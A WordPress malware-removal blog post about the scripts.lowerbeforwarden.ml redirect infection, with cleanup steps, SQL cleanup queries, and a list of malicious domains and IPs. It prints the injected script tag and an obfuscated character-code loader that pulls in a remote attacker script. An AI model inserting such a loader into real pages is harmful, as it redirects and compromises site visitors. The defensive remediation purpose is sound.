scripts.lowerbeforwarden.ml is never Version of js.donatelloflowfirstly. ga virus and it is infecting all those site who are unable to fix back door yet

js.donatelloflowfirstly.ga is very savior Malware Inject types of virus and thousands of WordPress sites are infected with this virus

This guide is now old, check out a new one here

How to Check For scripts.lowerbeforwarden.ml

How to Check For location.lowerbeforwarden.ml

if your site redirects visitors to some ugly looking webpages this virus may exist in your site

you might find following scripts embedded in your site every where

<script src='https://scripts.lowerbeforwarden.ml/src.js?n=ns1' type='text/javascript'></script>

or

<script src='https://location.lowerbeforwarden.ml/src.js?n=ns1' type='text/javascript'></script>

yes that is one the scripts that this virus is inserting

and here is

encrypted version of scripts.lowerbeforwarden.ml virus script

<noscript><style type="text/css"> .wpb_animate_when_almost_visible { opacity: 1; }</style></noscript> <script type=text/javascript> Element.prototype.appendAfter = function(element) {element.parentNode.insertBefore(this, element.nextSibling);}, false;(function() { var elem = document.createElement(String.fromCharCode(115,99,114,105,112,116)); elem.type = String.fromCharCode(116,101,120,116,47,106,97,118,97,115,99,114,105,112,116); elem.src = String.fromCharCode(104,116,116,112,115,58,47,47,115,99,114,105,112,116,115,46,108,111,119,101,114,98,101,102,111,114,119,97,114,100,101,110,46,109,108,47,115,114,99,46,106,115);elem.appendAfter(document.getElementsByTagName(String.fromCharCode(115,99,114,105,112,116))[0]);elem.appendAfter(document.getElementsByTagName(String.fromCharCode(104,101,97,100))[0]);document.getElementsByTagName(String.fromCharCode(104,101,97,100))[0].appendChild(elem);})();</script></head>

Here is Decoded script

<noscript><style type="text/css"> .wpb_animate_when_almost_visible { opacity: 1; }</style></noscript> <script type=text/javascript> Element.prototype.appendAfter = function(element) {element.parentNode.insertBefore(this, element.nextSibling);}, false;(function() { var elem = document.createElement(script); elem.type = text/javascript elem.src = https://scripts.lowerbeforwarden.ml/src.jselem.appendAfter(document.getElementsByTagName(script)[0]);elem.appendAfter(document.getElementsByTagName(head)[0]);document.getElementsByTagName(head)[0].appendChild(elem);})();</script></head>

How to clean scripts.lowerbeforwarden.ml virus

Create a backup of your whole site including Database before changing any code

  1. first, Delete _a or _f or _2 etc ……. file from your sites home dedicatory

2. Delete if you spot any malicious code Mu-Plugins Folder

Check all the files under wp-content/mu-plugins and see for any suspicious file and delete them. While working for a user in cleaning this vulnerability I see that he was using nulled WordPress plugins. Because of adding additional functionality in the nulled plugin  rms-script-ini.php function creates another file under wp-content/mu-plugins ie;  rms_unique_wp_mu_pl_fl_nm.php, which creates a communication channel between hacker site and your website. By completing this step you had cleaned up remaining traces of vulnerability.

Goto PHPmyadmin. Click on Database and run the following SQL query to remove scripts from Wp_Posts tables

UPDATE wp_posts SET post_content = (REPLACE (post_content, “<script src='https://scripts.lowerbeforwarden.ml/src.js?n=ns1' type='text/javascript'></script>”, ""));

or

UPDATE wp_posts SET post_content = (REPLACE (post_content, “<script src='https://location.lowerbeforwarden.ml/src.js?n=ns1' type='text/javascript'></script>”, ""));

If You want any more help to remove this virus you can mail me [email protected]

 Clean Core Files

There are many ways to clean your wordpress files. Here is my way:

1): Zip all the site files and download the zip file to desktop.

2): Unzip the files to the folder, ” txnkaro” as an example.

3): Located to the folder  wp-content / plugins , and delete all plugins. Then replace with the clean plugins into the folder. Same with themes files, delete all themes and replace with clean themes.

4): Now run the VSCode editor, you can download it at: https://code.visualstudio.com/ and install it.

5): Open the  txnkaro (example) folder via VSCode, then click  Edit > Search in the files  to search the keywords:  donatelloflowfirstly, lowerbeforwarden. There should be only a few files been found since we have deleted all Cached Files and replaced all Themes and Plugins. Edit those files if you know how to or just replace them with clean files.

6): All files should be clean now. Delete your whole site, and upload this clean backup to the site folder. Your site should be OK.

There is another way to clean the file if you can login to site admin panel. Install  Wordfence  plugin and scan the whole stie. The Wordfence will find out those injected files, just edit them or replace them with clean files.

Now clean Your website cache files and your your browser cache and check virus should gone

If You are looking For Some One Professional who can Help to remove viruses permanently from your website check out my gig on fiverr

List of  malicious URLs:
js.donatelloflowfirstly.ga/stats.js
detect.donatelloflowfirstly.ga
go.donatelloflowfirstly.ga/go.php?1=1
go.donatelloflowfirstly.ga/do.php?follow=1&re=5&id=163
blackwaterforllows.ga/?p=gfqtqojrmu5gi3bpgiydknq
developerstatss.ga
bestprize-places-here1.life/?u=8hkk605&o=45y8yn8
hxxps://blackwaterforllows.ga/w_14.js
hxxps://winworker.club/sw/w_11.js

amastybootstrap.host

amastybootstrap.online

amastybootstrap.store

bootstrapcd.online

bootstrapcss.ost

bootstrapcss.online

dbbootstrap.online

Other malicious domains within the same network:
tomog.pro, mysbitl.com, nwliko.com, tbtrck.com, bestprize-places-here1.life, mobile-global-apps-store.life, mobile-global-apps-store.life, beawickcampaing.ga, bluemountainreserve.ga, blackwaterforllows.ga, check-you-robot.site, superinterestinginfo.info,
allow-space.com, allowandgo.com, check-you-robot.online, check-you-robot.site, checkandgo.info, clckask.club, clickjump.biz, clickpush.biz, traffsend.me, reclick.club, pumesh.xyz, clicktms.club, wwopenclick.club.
clickgate.biz, clickworker.me, wwclickads.club, wwclicktm.club, wwclicktm.club, clickworker.me

Malicious IPs: 45.9.148.126, 157.245.79.75.

2 Comments

  • Msolis81 says:

    Thanks for the info. One thing this virus do is that wp-login.php and wp-admin show a 500 error. I got my website fixed but I can’t log in.

  • Sean Higgins says:

    Thank you for this article. It was very helpful in resolving my issue with scripts.lowerbeforwarden.ml. I had to check my wp_posts to get the syntax of the script as my script was slightly different than you version.

Leave a Reply